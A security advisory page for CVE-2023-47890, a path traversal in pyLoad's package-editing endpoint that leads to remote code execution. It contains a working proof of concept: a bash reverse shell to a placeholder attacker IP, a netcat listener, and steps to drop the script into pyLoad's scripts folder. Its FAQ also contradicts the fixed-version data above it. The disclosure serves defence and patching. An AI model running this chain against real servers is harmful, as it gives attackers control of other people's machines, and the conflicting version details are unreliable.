CVE-2023-47890: Path Traversal

Published Nov 21, 2023
·
Updated

Summary

A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.

Details

When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.

src/pyload/core/api/init.py::addpackage::L432

python folder = ( folder.replace("http://", "") .replace("https://", "") .replace(":", "") .replace("/", "") .replace("\\", "") )

So if a package were created with the name "../" the application would instead create the folder "/downloads/../"

However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.

src/pyload/webui/app/blueprints/jsonblueprint.py::editpackage::L195

python id = int(flask.request.form["packid"]) data = { "name": flask.request.form["packname"], "folder": flask.request.form["packfolder"], "password": flask.request.form["packpws"], }

api.setpackagedata(id, data)

Steps to reproduce

1. Login to a pyLoad instance 2. Go to "Queue" and create a new package with any name and a valid link 3. Click "Edit Package" on the newly created package and set the folder as "/config/scripts/downloadfinished/" 4. Restart the package 5. Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/downloadfinished/"

Remote code execution proof-of-concept

It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.

On attacker machine

1. Start a web server hosting a malicious script

bash echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attackerip>/9999 0>&1' > evil.sh&1 sudo python3 -m http.server 80

2. Start netcat listener for reverse shells

bash nc -vklp 9999

On pyLoad

1. Change pyLoad file permission settings

Change permissions of downloads: On Permission mode for downloaded files: 0744

2. Create a package with link pointing to the attacker

http://<attackerip>/evil.sh

3. Edit package and change folder to /config/scripts/packagedeleted/

4. Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

5. Delete any package package to trigger the script

Impact

An authenticated user can gain control over the underlying pyLoad server.

Other sources

pyLoad 0.5.0 is vulnerable to Unrestricted File Upload.

— NVD

Affected Software

2 affected componentsFixes available
pip/pyload-ng<0.5.0b3.dev75
0.5.0b3.dev75
pyload pyload=0.5.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/pyload-ng to a version that resolves this vulnerability.

    Fixed in 0.5.0b3.dev75

Event History

Nov 21, 2023
Advisory Published
10:19 PM
Jan 8, 2024
CVE Published
via MITRE·12:00 AM
Data Sourced
via MITRE·12:00 AM
Description
Data Sourced
via NVD·08:15 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the vulnerability ID for this issue?

The vulnerability ID for this issue is CVE-2023-47890.

2

What is the severity of CVE-2023-47890?

The severity of CVE-2023-47890 is high with a CVSS score of 7.6.

3

How does CVE-2023-47890 work?

CVE-2023-47890 allows a web UI user to store files anywhere on the pyLoad server and gain command execution through script abuse.

4

What software is affected by CVE-2023-47890?

The pyload-ng package version 0.5.0b3.dev75 is affected by CVE-2023-47890.

5

How do I fix CVE-2023-47890?

To fix CVE-2023-47890, update the pyload-ng package to version 0.5.0b3.dev76 or later.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203